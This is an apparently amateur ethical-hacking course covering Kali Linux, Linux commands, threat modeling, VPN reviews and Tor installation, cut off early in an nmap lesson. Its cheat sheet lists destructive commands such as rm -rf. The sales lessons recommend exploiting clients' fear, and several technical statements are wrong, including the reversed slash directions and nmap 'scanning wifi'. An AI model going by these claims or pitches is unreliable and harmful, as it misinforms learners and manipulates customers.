Ethical Hacking Course from KYAnonymous

Prévia do material em texto

Lesson 1: Introduction to Kali Linux 
 
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It 
is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon 
Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux 
distribution. 
 
Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), 
Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for 
penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security 
scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a 
live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit 
Project’s Metasploit Framework, a tool for developing and executing security exploits. 
Introduction to Kali Linux 
 
:From kali website: 
 
Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution. 
Kali Linux Features 
 
Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. 
All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our 
VCS. 
 
More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we 
eliminated a great number of tools that either did not work or had other tools available that provided 
similar functionality. 
Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will 
never, ever have to pay for Kali Linux. 
Open source Git tree: We are huge proponents of open source software and our development tree is 
available for all to see and all sources are available for those who wish to tweak and rebuild packages. 
FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all 
Linux users to easily locate binaries, support files, libraries, etc. 
Vast wireless device support: We have built Kali Linux to support as many wireless devices as we 
possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with 
numerous USB and other wireless devices. 
Custom kernel patched for injection: As penetration testers, the development team often needs to do 
wireless assessments so our kernel has the latest injection patches included. 
Secure development environment: The Kali Linux team is made up of a small group of trusted individuals 
who can only commit packages and interact with the repositories while using multiple secure protocols. 
GPG signed packages and repos: All Kali packages are signed by each individual developer when they 
are built and committed and the repositories subsequently sign the packages as well. 
Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has 
true multilingual support, allowing more users to operate in their native language and locate the tools they 
need for the job. 
Completely customizable: 
ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and 
inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting 
in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories 
integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of 
the distribution. Kali is currently available for the following ARM devices: 
- rk3306 mk/ss808 
- Raspberry Pi 
- ODROID U2/X2 
- Samsung Chromebook 
- EfikaMX 
- Beaglebone Black 
- CuBox 
- Galaxy Note 10.1 
 
.................. 
 
Okay class, its important to realize that most of the commands in kali are GUI or graphic user interface 
unlike previous installations of backtrack which require terminal input. 
 
Terminal is like windows command prompt, with a derivative you will be quick to notice, in file paths in 
windows the slash is forwards 
 
\ 
 
In the linux enviroment, the slash is backwards 
 
/ 
 
***Important*** 
Filepaths are case sensitive and when launching a program you also have to type the extension. 
 
Ex. Root/user/admin/torhammer.py 
 
If you had the above program installed, the extension being ".py" would launch the program. 
 
Another cool thing about kali, and linux period, is if and when you learn a programming language, you 
can code your own programs in their "notepad" style program and save it as something like 
"hacklikeaboss.py" and it will save as a python file, then right click and change advanced settings to 
executable file andddddd voila! Your very own custom program has been created. 
 
Enough about kali, im sure youre ready to get started on lesson 2 
 
Lesson 2 : Real World applications for kali, forming your own business, and introduction to terminal, the 
hacker's best friend. 
 
Lesson 2: Real World Applications for Kali Linux 
 
Greetings class: 
Real world applications for Kali Linux are very diverse. Incorperating them into your repertoire as a sales pitch 
is crucial to forming a thriving business model that will generate revenue for you and your company. 
Small business examples: 
Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work 
from home. These are businesses that you will start with at first to build a reputation. 
Stressing the importance of Data Security to the customer is an integral part of the sales pitch. Looking up 
articles about local businesses around your area, and even college databases being breached can not only 
raise awareness, but also raise the fear factor. Ever heard the term a little fear is healthy? Well fear sells, and 
in todays day and age everyone is digital. 
Some people run their business sites via wordpress, even blog on them daily about events. This consumes a 
good portion of time for the client, and if someone were to access that because they had a faulty line of code in 
their site, they could not only lose their investment, but lose customers and customer data as well. 
A Kali Linux application for this would be a tool called wpscan, which we will review later on, but it scans the 
site for vulnerabilities allowing you to report them to the sitemaster or admin. 
Its illegal to scan without permission, always get permission. 
Another tool to use would be nmap 
This tool scans open ports on wifi connections 
Open ports are like open doors that anyone with the right knowledge can access, and access things like 
customer data, and even credit card transaction information. 
You will find when launching these programs via the drop down menu that they launch a sort of command 
prompt via a program called terminal. Kali is already preconfigured to run root access, so a tutorial in sudo isnt 
necessary. 
Terminal accepts your commands and runs basically every function on kali and this is where you will spend 
most of your time. 
Everytime you start kali, if its a live disk and not a full install, i recommend opening up a terminal first thing 
Then type 
apt-get update 
This updates the files 
You can also search for upgraded software 
apt-get upgrade 
Other commands are listed below 
System Info 
date – Show the current date and time 
cal – Show this month's calendar 
uptime – Show current uptime 
w – Display who is online 
whoami – Who you are logged in as 
finger user – Display information about user 
uname -a – Show kernel information 
cat /proc/cpuinfo – CPU information 
cat /proc/meminfo – Memoryinformation 
df -h – Show disk usage 
du – Show directory space usage 
free – Show memory and swap usage 
Keyboard Shortcuts 
Enter – Run the command 
Up Arrow – Show the previous command 
Ctrl + R – Allows you to type a part of the command you're looking for and finds it 
Ctrl + Z – Stops the current command, resume with fg in the foreground or bg in the background 
Ctrl + C – Halts the current command, cancel the current operation and/or start with a fresh new line 
Ctrl + L – Clear the screen 
command | less – Allows the scrolling of the bash command window using Shift + Up Arrowand Shift + 
Down Arrow 
!! – Repeats the last command 
command !$ – Repeats the last argument of the previous command 
Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it 
before executing the command 
Ctrl + A – Return to the start of the command you're typing 
Ctrl + E – Go to the end of the command you're typing 
Ctrl + U – Cut everything before the cursor to a special clipboard, erases the whole line 
Ctrl + K – Cut everything after the cursor to a special clipboard 
Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to 
Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from 
the left to the right, try it!) 
Ctrl + W – Delete the word / argument left of the cursor in the current line 
Ctrl + D – Log out of current session, similar to exit 
Learn the Commands 
apropos subject – List manual pages for subject 
man -k keyword – Display man pages containing keyword 
man command – Show the manual for command 
man -t man | ps2pdf - > man.pdf – Make a pdf of a manual page 
which command – Show full path name of command 
time command – See how long a command takes 
whereis app – Show possible locations of app 
which app – Show which app will be run by default; it shows the full path 
Searching 
grep pattern files – Search for pattern in files 
grep -r pattern dir – Search recursively for pattern in dir 
command | grep pattern – Search for pattern in the output of command 
locate file – Find all instances of file 
find / -name filename – Starting with the root directory, look for the file called filename 
find / -name ”*filename*” – Starting with the root directory, look for the file containing the string filename 
locate filename – Find a file called filename using the locate command; this assumes you have already used 
the command updatedb (see next) 
updatedb – Create or update the database of files on all file systems attached to the Linux root directory 
which filename – Show the subdirectory containing the executable file called filename 
grep TextStringToFind /dir – Starting with the directory called dir, look for and list all files 
containing TextStringToFind 
File Permissions 
chmod octal file – Change the permissions of file to octal, which can be found separately for user, group, 
and world by adding: 4 – read (r),2 – write (w), 1 – execute (x) 
Examples: 
chmod 777 – read, write, execute for all 
chmod 755 – rwx for owner, rx for group and world 
For more options, see man chmod. 
File Commands 
ls – Directory listing 
ls -l – List files in current directory using long format 
ls -laC – List all files in current directory in long format and display in columns 
ls -F – List files in current directory and indicate the file type 
ls -al – Formatted listing with hidden files 
cd dir – Change directory to dir 
cd – Change to home 
mkdir dir – Create a directory dir 
pwd – Show current directory 
rm name – Remove a file or directory called name 
rm -r dir – Delete directory dir 
rm -f file – Force remove file 
rm -rf dir – Force remove an entire directory dir and all it’s included files and subdirectories (use with extreme 
caution) 
cp file1 file2 – Copy file1 to file2 
cp -r dir1 dir2 – Copy dir1 to dir2; create dir2 if it doesn't exist 
cp file /home/dirname – Copy the filename called file to the /home/dirname directory 
mv file /home/dirname – Move the file called filename to the /home/dirname directory 
mv file1 file2 – Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2 
ln -s file link – Create symbolic link link to file 
touch file – Create or update file 
cat > file – Places standard input into file 
cat file – Display the file called file 
more file – Display the file called file one page at a time, proceed to next page using the spacebar 
head file – Output the first 10 lines of file 
head -20 file – Display the first 20 lines of the file called file 
tail file – Output the last 10 lines of file 
tail -20 file – Display the last 20 lines of the file called file 
tail -f file – Output the contents of file as it grows, starting with the last 10 lines 
Compression 
tar cf file.tar files – Create a tar named file.tar containing files 
tar xf file.tar – Extract the files from file.tar 
tar czf file.tar.gz files – Create a tar with Gzip compression 
tar xzf file.tar.gz – Extract a tar using Gzip 
tar cjf file.tar.bz2 – Create a tar with Bzip2 compression 
tar xjf file.tar.bz2 – Extract a tar using Bzip2 
gzip file – Compresses file and renames it to file.gz 
gzip -d file.gz – Decompresses file.gz back to file 
Printing 
/etc/rc.d/init.d/lpd start – Start the print daemon 
/etc/rc.d/init.d/lpd stop – Stop the print daemon 
/etc/rc.d/init.d/lpd status – Display status of the print daemon 
lpq – Display jobs in print queue 
lprm – Remove jobs from queue 
lpr – Print a file 
lpc – Printer control tool 
man subject | lpr – Print the manual page called subject as plain text 
man -t subject | lpr – Print the manual page called subject as Postscript output 
printtool – Start X printer setup interface 
Network 
ifconfig – List IP addresses for all devices on the local machine 
iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for 
example: the frequency) 
iwlist – used to display some additional information from a wireless network interface that is not displayed 
by iwconfig 
ping host – Ping host and output results 
whois domain – Get whois information for domain 
dig domain – Get DNS information for domain 
dig -x host – Reverse lookup host 
wget file – Download file 
wget -c file – Continue a stopped download 
SSH 
ssh user@host – Connect to host as user 
ssh -p port user@host – Connect to host on port port as user 
ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login 
User Administration 
adduser accountname – Create a new user call accountname 
passwd accountname – Give accountname a new password 
su – Log in as superuser from current login 
exit – Stop being superuser and revert to normal user 
Process Management 
ps – Display your currently active processes 
top – Display all running processes 
kill pid – Kill process id pid 
killall proc – Kill all processes named proc (use with extreme caution) 
bg – Lists stopped or background jobs; resume a stopped job in the background 
fg – Brings the most recent job to foreground 
fg n – Brings job n to the foreground 
Installation from source 
./configure 
make 
make install 
dpkg -i pkg.deb – install a DEB package (Debian / Ubuntu / Linux Mint) 
rpm -Uvh pkg.rpm – install a RPM package (Red Hat / Fedora) 
Stopping & Starting 
shutdown -h now – Shutdown the system now and do not reboot 
halt – Stop all processes - same as above 
shutdown -r 5 – Shutdown the system in 5 minutes and reboot 
shutdown -r now – Shutdown the system now and reboot 
reboot – Stop all processes and then reboot - same as above 
startx – Start the X system 
 
Lesson 3: Threat assessment and how to sell it 
 
Good morning class, 
I hope you have had time toexperiment with terminal commands and familiarize yourelves with the file 
structure of Kali Linux. 
Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this 
fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson 
will be on threat assessment. 
Now for a little roleplay. 
Company xyz is a fortune 500 company, who buys and trades domains on the market, processing credit cars 
and bank transactions, storing customer information on encrypted servers, and has an option for member sign 
up. You ask them and they say they are running sql databases. 
How would you approach the company to sell your business? 
Respond to this email with your answer. 
My answer will be included in lesson 4 
Now on threat assessment, 
Modeling 
There is no single solution for keeping yourself safe online. Digital security isn’t about which tools you use; 
rather, it’s about understanding the threats you face and how you can counter those threats. To become more 
secure, you must determine what you need to protect, and whom you need to protect it from. Threats can 
change depending on where you’re located, what you’re doing, and whom you’re working with. Therefore, in 
order to determine what solutions will be best for you, you should conduct a threat modeling assessment. 
When conducting an assessment, there are five main questions you should ask yourself: 
What do you want to protect?Who do you want to protect it from?How likely is it that you will need to protect 
it?How bad are the consequences if you fail?How much trouble are you willing to go through in order to try to 
prevent those? 
When we talk about the first question, we often refer to assets, or the things that you are trying to protect. 
An assett is something you value and want to protect. When we are talking about digital security, the assets in 
question are usually information. For example, your emails, contact lists, instant messages, and files are all 
assets. Your devices are also assets. 
Write down a list of data that you keep, where it’s kept, who has access to it, and what stops others 
from accessing it. 
In order to answer the second question, “Who do you want to protect it from,” it’s important to understand who 
might want to target you or your information, or who is your adversary. An adversary is any person or entity that 
poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government, 
or a hacker on a public network. 
Make a list of who might want to get ahold of your data or communications. It might be an individual, a 
government agency, or a corporation. 
A threat is something bad that can happen to an asset. There are numerous ways that an adversary can 
threaten your data. For example, an adversary can read your private communications as they pass through the 
network, or they can delete or corrupt your data. An adversary could also disable your access to your own data. 
The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a 
video showing police violence may be content to simply delete or reduce the availability of that video, whereas 
a political opponent may wish to gain access to secret content and publish it without you knowing. 
Write down what your adversary might want to do with your private data. 
The capability of your attacker is also an important thing to think about. For example, your mobile phone 
provider has access to all of your phone records and therefore has the capability to use that data against you. 
A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might 
have stronger capabilities. 
A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will 
actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to 
access all of your data, the risk of them posting your private data online to harm your reputation is low. 
It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the 
likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk 
of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where 
they are not). 
Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or 
views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because 
the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high 
risks because they don't view the threat as a problem. 
In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into 
enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to 
be available than confidential. 
Now, let’s practice threat modeling. 
If you want to keep your house and possessions safe, here are a few questions you might ask: 
Should I lock my door?What kind of lock or locks should I invest in?Do I need a more advanced security 
system?What are the assets in this scenario?The privacy of my homeThe items inside my homeWhat is the 
threat?Someone could break in.What is the actual risk of someone breaking in? Is it likely? 
Once you have asked yourself these questions, you are in a position to assess what measures to take. If your 
possessions are valuable, but the risk of a break-in is low, then you probably won’t want to invest too much 
money in a lock. On the other hand, if the risk is high, you’ll want to get the best locks on the market, and 
perhaps even add a security system. 
 
Lesson 4: Opsec, VPN, Tor. 
 
Opsec stands for "operational security" and is a term coined by the special forces in the United States military. 
When it comes to hacking, Opsec is essential as to not let your opponent know that you are on to them. If you 
are hired to test the security already in place, it would be obvious that you would need to learn ways to mask 
your attacks. 
Virtual Private Networks or VPNs: 
What Is A VPN? 
A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the 
Internet) to a remote network/location. This remote network is typically a private network, such as a workplace 
or home network, or one provided by a commercial VPN service. 
A VPN can be thought to create a "tunnel" through the public network to your private network at the other end. 
All network traffic through this tunnel is encrypted to ensure it is kept secure and private. 
What Does A VPN Let Me Do? 
A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard 
network. This includes: 
Network Security & Privacy: All network traffic through your VPN connection is kept secure. This allows you 
to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your 
network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network 
traffic, such as see what you are viewing, steal your information and login details, etc. 
Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you 
were physically in the office. You can then do things like access file servers, computers, databases, email, 
internal webpages, and other services you might not have access to outside of your work network. 
Access Your Home Network: Connecting back home using a VPN allows you to access your computers 
remotely. Accessfiles on your computer, view iTunes shares, take remote control of your computer, and 
access other services. 
Access Location Restricted Content: By connecting to a VPN server in another location you can make it 
appear to websites using geolocation that you are physically in the correct location for access. So when you're 
travelling overseas you can still view websites you would normally use at home, such as television, movie and 
music streaming websites. 
Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed, 
meaning that many applications like VOIP, instant messenging, video chat, and games will not work. However 
using a VPN you can tunnel through such restrictions and allow all of your network applications to work. 
Viscosity even allows you to tunnel through a HTTP or SOCKS proxies to establish your VPN connection. 
Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that 
would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a 
VPN provides a way to still maintain access to the services you would normally use. 
Why Should I Use A VPN? 
Even if you have no desire to be able to access a private network remotely, a VPN is vital to ensure the 
security and privacy of your network traffic. 
Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious 
users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing, 
steal username and passwords, steal session information to be able to log into sites as you, and extract other 
private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only 
monitor in depth your network traffic, but also alter your traffic or inject their own in an attempt to fool a user into 
revealing important data. 
Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it 
secure and private. 
How Does A VPN Work? 
A typical VPN consists of two components: the VPN client and the VPN server. 
A VPN client is the software that allows a user to connect their computer to the VPN server and establish the 
VPN connection. It is installed on the user's computer and communicates with the VPN server to create a 
secure link for the user's network traffic. The VPN Client is what the end user uses to control their VPN 
connection. Viscosity performs the duties of a VPN client. 
A VPN server is setup at the location users want to connect to, such as at a workplace or at home. A VPN 
Server usually configured and maintained by IT staff, however home users often set up their own VPN personal 
VPN server at home or at a remote location as well. End users rarely have to interact with the VPN Server. A 
VPN server will also perform authentication to ensure only registered users can connect to the VPN. 
All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it 
private and secure. 
What Is OpenVPN? 
OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Like IPSec and PPTP, OpenVPN 
handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to 
its high level of security, customizability, and compatibility with most network environments. 
VPN Service Providers 
There are many companies that specialize in providing a commercial VPN service. These companies are 
known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing 
you to not only get the security and privacy benefits on a VPN, but also making it easy to access websites that 
restrict access to certain counties. Most VPN Service Providers charge a small monthly or yearly fee for access 
to their servers, however there are also a number of free service providers. 
The key to choosing a quality vpn comes down to two factors, 
1) do they cooperate with united states gov subpoenas 
2 do they keep logs (you dont want logs) 
TorGuard 
TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the 
ability to connect to torrent-friendly services if you need to download something, encryption and anonymity-
friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service 
providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN—even 
if you don't use them—isn't leaking DNS and thus information you thought was secure. Depending on your 
usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN 
service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous 
proxy or a torrent proxy. Their full VPN service however features over 200 exit servers in 18 countries, no 
logging or data retention of any kind, and their network is set up in a way that they actually have no information 
to collect on their user activities—they don't know what you're doing or when you're connected. They delivered 
a really great response to Torrentfreak's questions that's well worth a read for more info. They also support 
multiple connectivity protocols, support for virtually every desktop and mobile OS, and even offer their 
customers encrypted, offshore email service if you want to take advantage. 
Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN 
servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt 
or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies.") You 
also noted that they support OpenVPN, help you get connected via your home network, and have great 
customer service. 
IPVanish VPN 
IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they 
say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're 
compromising security though—they have over 14,0000 IPs to share on over a hundred exit servers in 47 
different countries. You can choose where you'd prefer to connect, which again is perfect for getting around 
location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X, 
Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and 
Android, and they offer configuration utilities so you can set you home router to connect to them as well. They 
feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your 
activities, and only log a few things. Torrentfreak gave them the nod as well. Accounts with IPVanish 
are$10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols.) 
IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage 
to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while 
giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that 
they're happy with you streaming video or music while you're connected to get around pesky content blocks, 
especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back 
home or make use of their streaming music subscription. 
CyberGhost VPN 
CyberGhost has been around for a long time, they made a great showing in the call for contenders thread. Like 
any good, trustworthy VPN provider,they both encrypt all of the data that passes through your connection and 
anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the 
go, you may be able to get away with a free account. The service just went through a massive overhaul about a 
year ago, where they removed traffic and bandwidth restrictions for free accounts, and improved security from 
the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're 
connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different 
countries (free users can pick from one of 14, still impressive for a free service), and you cansee server status 
at any time 
 
Their clients are easy to use, support virtually every mobile and desktop platforms, and they don't discriminate 
against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to 
get around their location-blocks.) 
The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3 
hours, and are limited to the official client, while pro accounts can use other connection protoctols and have 
way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if 
you need more than one device connected at any given time, you'll need to step up to Premium Plus, at 
$11/mo and $70/yr. Those of you who praised the service noted their great connection speeds, wealth of 
servers to choose from (even for free users). Read more in the nomination thread here. 
Do-It-Yourself 
Of course, no list of great options would be complete with the DIY approach. If you don't need exit servers in 
different countries, and your primary need is to encrypt and secure your data when you're away from home, 
you can roll yout own VPN with OpenVPN or a number of other free, open-source tools. Many of the best 
routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato 
firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is 
that you get to set the level of encryption, you get complete control over who connects and who has access to 
what parts of your home network, and where your data goes from there. 
Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with 
a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port 
blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their 
VPN running there while they connect to it when necessary. The sky's the limit with the DIY option, it just takes 
the skill and knowhow to do it, and some compromise on the level of features and tools you get. 
We have more than a few honorable mentions this week, including one of my personal favorites, Hideman 
VPN, for their cross-platform, mobile-friendly, no-logging VPN service—complete with free VPN options for 
people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are 
the great people over at Tunnelbear, who are constantly working to improve and update their service to help 
you get around regional restrictions and blocks—-and recently unveiled a browser add-on to tunnel some 
services but not others, giving you even more control over your connection. 
We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly 
need. You can forward remote ports, pick and choose exit services in multiple countries, and even generate an 
OpenVPN config through their wizard to connect your home network to their service all the time—oh, and they 
don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking 
to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to 
externally, they're worth a look. 
We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company 
that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but 
you'll sign up for Giganews when you get it. They did very well in the call for contenders thread—although 
many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. They 
have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the 
time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least log 
user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days. That's not an 
issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011on the topic, cagey 
with me when I last spoke to a rep from the company, andthis Reddit thread is rather illuminating as well. Still, 
there are signs thatthings may be changing with VyprVPN. The feature set and the face of the company both 
look good, and they combine Usenet with VPN services which is great, but we don't feel comfortable calling 
them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of 
your data. 
A final note—something we mentioned when we talked —don't fall into the geography trap, assuming that an 
overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in 
your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more 
trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who 
asks—and there are definitely VPN providers that fall in both categories 
 
Tor — a privacy oriented encrypted anonymizing service, has announced the launch of its next version of Tor 
Browser Bundle, i.e. Tor version 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of 
online users on the Internet. 
Tor Browser helps users to browse the Internet in a complete anonymous way. The powerful Tor Browser 
Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. 
Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ 
anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and 
HTTPS-Everywhere. 
NEW FEATURES 
The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a few number of new features: 
Updated to Firefox to 31.5.0esr with important security updates.Update OpenSSL to 1.0.1lUpdate NoScript to 
2.6.9.15Update HTTPS-Everywhere to 4.0.3 
BUG FIXES 
Meanwhile, the new Tor version 4.0.4 also include some bugfixes:Bug 14203: Prevent meek from displaying an 
extra update notificationBug 14849: Remove new NoScript menu option to make permissions permanentBug 
14851: Set NoScript pref to disable permanent permissions 
"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from 
our distribution directory," states the Tor project team. 
Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. 
Tor is an encrypted anonymizing network considered to be one of the most privacy oriented service and is 
mostly used by activists, journalists to circumvent online censorship and surveillance efforts by various 
countries. 
However, late last year we have seen large scale cyber attack on Tor network that quietly seized some of its 
network specializedservers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays 
in the anonymous network service. 
On the other end of the side, last month 12 high-capacity Tor Middle relays was launched by the Polaris — a 
new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build 
more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps 
reduce finite number of Tor connections occurring at the same time. 
 
Installing Tor in Kali Linux: 
 
Step 1: Getting tor service ready 
There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options: 
 
Option #1: Install Tor from Kali Repository 
Tor is available in Kali repository, to install it directly from the repository open your Terminal and type this: 
apt-get install tor 
If no error occurs, follow the second step. 
 
Option #2: Install Tor from Debian Wheezy Repository 
If you can’t install Tor using the first method then you may try this option. In this way we are going to add the 
official Tor repository according to our Debian distribution. Not to be confused, Kali is actually based on Debian 
and it uses the package management from “Wheezy”. So we are going to use “Wheezy” as our distribution. 
Now open your terminal and follow these steps: 
 
Step #1: Add repo to sources.list file 
Lets add the distribution in the list by opening the sources.list file 
leafpad /etc/apt/sources.list 
Now add the following line at the bottom of the file, 
deb http://deb.torproject.org/torproject.org wheezy main 
 
Step #2: Add GPG Keys 
Now we need to add the gpg key used to sign the packages by running the following commands: 
gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export 
A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - 
 
Step #3: Update package lists 
Lets refresh our sources: 
apt-get update 
 
Step #4: Install singing keys 
Now, before installing the Tor we must add the signing key, 
apt-get install deb.torproject.org-keyring 
 
Step #5: Install Tor from Debian repository 
Finally, 
apt-get install tor 
Now Tor should be installed! 
If no error occurs, follow the second step. 
 
Option #3: Install Tor from development branch 
If you are an advanced user and you want to install Tor using the development branch then this method is for 
you. 
 
Step #1: Add Tor project repository to sources.list 
You need to add a different set of lines to your /etc/apt/sources.list file: 
deb http://deb.torproject.org/torproject.org wheezy main debhttp://deb.torproject.org/torproject.org tor-
experimental-0.2.5.x- wheezy main 
 
Step #2: Add GPG keys, keyring and install Tor 
Then run the following commands at your command prompt: 
gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export 
A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - apt-get update apt-get install tor 
deb.torproject.org-keyring 
Now Tor should be installed! 
If no error occurs, follow the second step. 
Note: This release will provide you more features but it contains bugs too. 
 
Option #4: Build and Install Tor from sources 
If you want to build your own debs from source you must first add an appropriate deb-srcline to sources.list. 
deb-src http://deb.torproject.org/torproject.org wheezy main deb-
srchttp://deb.torproject.org/torproject.org wheezy main deb-srchttp://deb.torproject.org/torproject.org tor-
experimental-0.2.5.x--wheezy main 
You also need to install the necessary packages to build your own debs and the packages needed to build Tor: 
apt-get install build-essential fakeroot devscripts apt-get build-dep tor 
Then you can build Tor in ~/debian-packages: 
mkdir ~/debian-packages; cd ~/debian-packages apt-get source tor cd tor-* debuild -rfakeroot -uc -us cd .. 
Now you can install the new package: 
dpkg -i tor_*.deb 
 
Step #2: Downloading and Running Tor bundle 
Download the Tor Bundle from here, 
https://www.torproject.org/projects/torbrowser.html.en 
Download the architecture-appropriate file above, save it somewhere, then run one of the following two 
commands to extract the package archive: 
tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz 
or (for the 64-bit version): 
tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz 
(where LANG is the language listed in the filename). 
Once that’s done, switch to the Tor browser directory by running: 
cd tor-browser_LANG 
(whereLANG is the language listed in the filename). 
To run the Tor Browser Bundle, execute the start-tor-browser script: 
./start-tor-browser 
This will launch Vidalia and once that connects to Tor, it will launch Firefox. 
Note: Do not unpack or run TBB as root. (though in Kali Linux, it doesn’t make any differences) 
 
Lesson 5: Introduction to NMap 
 
Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration, its GUI is user 
friendly and boasts a wide variety of features. 
Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many 
